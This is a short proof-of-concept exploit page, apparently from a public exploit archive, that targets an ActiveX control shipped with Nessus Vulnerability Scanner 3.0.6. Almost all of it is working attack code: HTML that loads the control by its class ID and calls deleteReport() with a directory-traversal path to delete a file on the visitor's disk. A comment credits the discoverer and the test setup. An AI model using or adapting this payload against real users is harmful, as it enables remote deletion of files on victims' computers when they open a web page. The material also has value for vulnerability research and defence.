Nessus Vulnerability Scanner 3.0.6 ActiveX Remote Delete File Exploit

<HTML> <!-- Nessus Vulnerability Scanner 3.0.6 ActiveX deleteReport() 0day Remote Delete File Exploit Bug discovered by Krystian Kloskowski (h07) <h07@interia.pl> Tested on Nessus 3.0.6 / IE 6 / XP SP2 Polish Just for fun ;] --> <object id="obj" classid="clsid:A47D5315-321D-4DEE-9DB3-18438023193B"></object> <script language="javascript"> obj.deleteReport("../../../../../../../test.txt"); //Deleting file: C:\test.txt alert("done"); </script> </HTML>